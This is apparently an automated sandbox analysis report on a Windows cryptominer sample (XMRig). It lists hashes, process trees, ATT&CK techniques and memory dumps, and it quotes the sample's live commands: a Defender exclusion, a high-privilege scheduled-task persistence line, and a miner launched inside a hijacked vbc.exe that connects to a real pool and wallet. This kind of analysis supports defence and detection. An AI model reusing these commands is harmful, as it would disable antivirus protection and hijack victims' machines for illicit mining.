xmrig | 8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61

Analysis

max time kernel
140s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
10-11-2022 20:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

19a474356662325b2059630216338194.exe
Size

1.1MB
MD5

19a474356662325b2059630216338194
SHA1

5537672751a37401bccf455f651d564bb314a924
SHA256

8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
SHA512

d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
SSDEEP

24576:8tPBwXgZiujGrs4EroJ7WtRDbQMPLqxpw3qt:CigZMsMN4v9jqxpwa

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4736-187-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4736-188-0x0000000140343234-mapping.dmp	xmrig
behavioral2/memory/4736-189-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4736-190-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4736-192-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4736-194-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

AVPTQBAEW.exe

pid process

4388 AVPTQBAEW.exe

pid	process
4388	AVPTQBAEW.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AVPTQBAEW.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	AVPTQBAEW.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

AVPTQBAEW.exe

description pid process target process

PID 4388 set thread context of 4736 4388 AVPTQBAEW.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3504 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4060 timeout.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exeAVPTQBAEW.exe

pid process

2264 powershell.exe
2264 powershell.exe
4444 powershell.exe
4444 powershell.exe
4388 AVPTQBAEW.exe
4388 AVPTQBAEW.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

672

description	pid	process	target process
PID 4388 set thread context of 4736	4388	AVPTQBAEW.exe	vbc.exe

pid	process
3504	schtasks.exe

pid	process
4060	timeout.exe

pid	process
2264	powershell.exe
2264	powershell.exe
4444	powershell.exe
4444	powershell.exe
4388	AVPTQBAEW.exe
4388	AVPTQBAEW.exe

pid	process
672

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

19a474356662325b2059630216338194.exepowershell.exeAVPTQBAEW.exepowershell.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	4972	19a474356662325b2059630216338194.exe
Token: SeDebugPrivilege	2264	powershell.exe
Token: SeDebugPrivilege	4388	AVPTQBAEW.exe
Token: SeDebugPrivilege	4444	powershell.exe
Token: SeLockMemoryPrivilege	4736	vbc.exe
Token: SeLockMemoryPrivilege	4736	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

4736 vbc.exe

pid	process
4736	vbc.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

19a474356662325b2059630216338194.execmd.exeAVPTQBAEW.execmd.exe

description	pid	process	target process
PID 4972 wrote to memory of 2264	4972	19a474356662325b2059630216338194.exe	powershell.exe
PID 4972 wrote to memory of 2264	4972	19a474356662325b2059630216338194.exe	powershell.exe
PID 4972 wrote to memory of 1840	4972	19a474356662325b2059630216338194.exe	cmd.exe
PID 4972 wrote to memory of 1840	4972	19a474356662325b2059630216338194.exe	cmd.exe
PID 1840 wrote to memory of 4060	1840	cmd.exe	timeout.exe
PID 1840 wrote to memory of 4060	1840	cmd.exe	timeout.exe
PID 1840 wrote to memory of 4388	1840	cmd.exe	AVPTQBAEW.exe
PID 1840 wrote to memory of 4388	1840	cmd.exe	AVPTQBAEW.exe
PID 4388 wrote to memory of 4444	4388	AVPTQBAEW.exe	powershell.exe
PID 4388 wrote to memory of 4444	4388	AVPTQBAEW.exe	powershell.exe
PID 4388 wrote to memory of 3800	4388	AVPTQBAEW.exe	cmd.exe
PID 4388 wrote to memory of 3800	4388	AVPTQBAEW.exe	cmd.exe
PID 3800 wrote to memory of 3504	3800	cmd.exe	schtasks.exe
PID 3800 wrote to memory of 3504	3800	cmd.exe	schtasks.exe
PID 4388 wrote to memory of 4736	4388	AVPTQBAEW.exe	vbc.exe
PID 4388 wrote to memory of 4736	4388	AVPTQBAEW.exe	vbc.exe
PID 4388 wrote to memory of 4736	4388	AVPTQBAEW.exe	vbc.exe
PID 4388 wrote to memory of 4736	4388	AVPTQBAEW.exe	vbc.exe
PID 4388 wrote to memory of 4736	4388	AVPTQBAEW.exe	vbc.exe
PID 4388 wrote to memory of 4736	4388	AVPTQBAEW.exe	vbc.exe
PID 4388 wrote to memory of 4736	4388	AVPTQBAEW.exe	vbc.exe
PID 4388 wrote to memory of 4736	4388	AVPTQBAEW.exe	vbc.exe
PID 4388 wrote to memory of 4736	4388	AVPTQBAEW.exe	vbc.exe
PID 4388 wrote to memory of 4736	4388	AVPTQBAEW.exe	vbc.exe
PID 4388 wrote to memory of 4736	4388	AVPTQBAEW.exe	vbc.exe
PID 4388 wrote to memory of 4736	4388	AVPTQBAEW.exe	vbc.exe
PID 4388 wrote to memory of 4736	4388	AVPTQBAEW.exe	vbc.exe
PID 4388 wrote to memory of 4736	4388	AVPTQBAEW.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\19a474356662325b2059630216338194.exe
"C:\Users\Admin\AppData\Local\Temp\19a474356662325b2059630216338194.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD9F9.tmp.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:1840

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:4060

C:\ProgramData\WindowsMail\AVPTQBAEW.exe
"C:\ProgramData\WindowsMail\AVPTQBAEW.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4444

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3800

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"
5⤵
- Creates scheduled task(s)
PID:3504

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4736

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\WindowsMail\AVPTQBAEW.exe

Filesize
1.1MB

MD5
19a474356662325b2059630216338194

SHA1
5537672751a37401bccf455f651d564bb314a924

SHA256
8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61

SHA512
d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4

Download Submit
C:\ProgramData\WindowsMail\AVPTQBAEW.exe

Filesize
1.1MB

MD5
19a474356662325b2059630216338194

SHA1
5537672751a37401bccf455f651d564bb314a924

SHA256
8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61

SHA512
d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpD9F9.tmp.bat

Filesize
149B

MD5
bfacba53b6862fce9f3109ea0c35cb6e

SHA1
7b0f4b503b4f118d4785b96ffa9a724780909997

SHA256
9d1f92cd52d708e9670d94297a9a19c61a7d5239072ab832fa64c3cd7a8abc46

SHA512
e7935b64f3dffab50cffc3987f8275f682a5728be29fb333feb48b8ffb38270c316fa4687ae76eb55e5c2f5a175b6312b14488afad8622acd89fc2543ad89420

Download Submit
memory/1840-147-0x0000000000000000-mapping.dmp

Download
memory/2264-155-0x00007FFD33C10000-0x00007FFD346D1000-memory.dmp

Filesize
10.8MB

Download
memory/2264-146-0x0000000000000000-mapping.dmp

Download
memory/2264-152-0x00007FFD33C10000-0x00007FFD346D1000-memory.dmp

Filesize
10.8MB

Download
memory/2264-150-0x00000164F60B0000-0x00000164F60D2000-memory.dmp

Filesize
136KB

Download
memory/3504-177-0x0000000000000000-mapping.dmp

Download
memory/3800-174-0x0000000000000000-mapping.dmp

Download
memory/4060-154-0x0000000000000000-mapping.dmp

Download
memory/4388-182-0x00007FFD50D10000-0x00007FFD50D7B000-memory.dmp

Filesize
428KB

Download
memory/4388-161-0x0000000002C40000-0x0000000002C83000-memory.dmp

Filesize
268KB

Download
memory/4388-196-0x00007FFD33B60000-0x00007FFD34621000-memory.dmp

Filesize
10.8MB

Download
memory/4388-195-0x0000000000540000-0x00000000007F2000-memory.dmp

Filesize
2.7MB

Download
memory/4388-186-0x00007FFD33B60000-0x00007FFD34621000-memory.dmp

Filesize
10.8MB

Download
memory/4388-185-0x0000000002C40000-0x0000000002C83000-memory.dmp

Filesize
268KB

Download
memory/4388-184-0x0000000000540000-0x00000000007F2000-memory.dmp

Filesize
2.7MB

Download
memory/4388-183-0x00007FFD4EC20000-0x00007FFD4EC5B000-memory.dmp

Filesize
236KB

Download
memory/4388-181-0x00007FFD2E7A0000-0x00007FFD2E8A2000-memory.dmp

Filesize
1.0MB

Download
memory/4388-180-0x00007FFD30EC0000-0x00007FFD30EF5000-memory.dmp

Filesize
212KB

Download
memory/4388-156-0x0000000000000000-mapping.dmp

Download
memory/4388-179-0x00007FFD4FC20000-0x00007FFD4FC47000-memory.dmp

Filesize
156KB

Download
memory/4388-171-0x00007FFD33B60000-0x00007FFD34621000-memory.dmp

Filesize
10.8MB

Download
memory/4388-170-0x00007FFD32130000-0x00007FFD3227E000-memory.dmp

Filesize
1.3MB

Download
memory/4388-160-0x0000000000540000-0x00000000007F2000-memory.dmp

Filesize
2.7MB

Download
memory/4388-163-0x00007FFD50550000-0x00007FFD505EE000-memory.dmp

Filesize
632KB

Download
memory/4388-162-0x00007FFD34630000-0x00007FFD346DA000-memory.dmp

Filesize
680KB

Download
memory/4388-164-0x00007FFD4D770000-0x00007FFD4D782000-memory.dmp

Filesize
72KB

Download
memory/4388-165-0x00007FFD33AA0000-0x00007FFD33B5D000-memory.dmp

Filesize
756KB

Download
memory/4388-166-0x00007FFD51DA0000-0x00007FFD51F41000-memory.dmp

Filesize
1.6MB

Download
memory/4388-167-0x00007FFD33B60000-0x00007FFD34621000-memory.dmp

Filesize
10.8MB

Download
memory/4388-168-0x00007FFD51BD0000-0x00007FFD51BFB000-memory.dmp

Filesize
172KB

Download
memory/4388-169-0x0000000000540000-0x00000000007F2000-memory.dmp

Filesize
2.7MB

Download
memory/4444-176-0x00007FFD33B60000-0x00007FFD34621000-memory.dmp

Filesize
10.8MB

Download
memory/4444-178-0x00007FFD33B60000-0x00007FFD34621000-memory.dmp

Filesize
10.8MB

Download
memory/4444-172-0x0000000000000000-mapping.dmp

Download
memory/4736-187-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4736-188-0x0000000140343234-mapping.dmp

Download
memory/4736-200-0x00000210188E0000-0x0000021018900000-memory.dmp

Filesize
128KB

Download
memory/4736-199-0x00000210188C0000-0x00000210188E0000-memory.dmp

Filesize
128KB

Download
memory/4736-198-0x00000210188E0000-0x0000021018900000-memory.dmp

Filesize
128KB

Download
memory/4736-197-0x00000210188C0000-0x00000210188E0000-memory.dmp

Filesize
128KB

Download
memory/4736-194-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4736-193-0x0000021018880000-0x00000210188C0000-memory.dmp

Filesize
256KB

Download
memory/4736-192-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4736-191-0x0000021018720000-0x0000021018740000-memory.dmp

Filesize
128KB

Download
memory/4736-190-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4736-189-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4972-140-0x00007FFD33C10000-0x00007FFD346D1000-memory.dmp

Filesize
10.8MB

Download
memory/4972-141-0x00007FFD51BD0000-0x00007FFD51BFB000-memory.dmp

Filesize
172KB

Download
memory/4972-145-0x00007FFD33C10000-0x00007FFD346D1000-memory.dmp

Filesize
10.8MB

Download
memory/4972-151-0x00007FFD33C10000-0x00007FFD346D1000-memory.dmp

Filesize
10.8MB

Download
memory/4972-144-0x00007FFD32400000-0x00007FFD3254E000-memory.dmp

Filesize
1.3MB

Download
memory/4972-142-0x0000000000890000-0x0000000000B42000-memory.dmp

Filesize
2.7MB

Download
memory/4972-133-0x00007FFD348E0000-0x00007FFD3498A000-memory.dmp

Filesize
680KB

Download
memory/4972-143-0x0000000000890000-0x0000000000B42000-memory.dmp

Filesize
2.7MB

Download
memory/4972-136-0x00007FFD34820000-0x00007FFD348DD000-memory.dmp

Filesize
756KB

Download
memory/4972-138-0x00007FFD51DA0000-0x00007FFD51F41000-memory.dmp

Filesize
1.6MB

Download
memory/4972-149-0x0000000001490000-0x00000000014D3000-memory.dmp

Filesize
268KB

Download
memory/4972-148-0x0000000000890000-0x0000000000B42000-memory.dmp

Filesize
2.7MB

Download
memory/4972-139-0x0000000001490000-0x00000000014D3000-memory.dmp

Filesize
268KB

Download
memory/4972-134-0x00007FFD50550000-0x00007FFD505EE000-memory.dmp

Filesize
632KB

Download
memory/4972-137-0x0000000000890000-0x0000000000B42000-memory.dmp

Filesize
2.7MB

Download
memory/4972-135-0x00007FFD4D770000-0x00007FFD4D782000-memory.dmp

Filesize
72KB

Download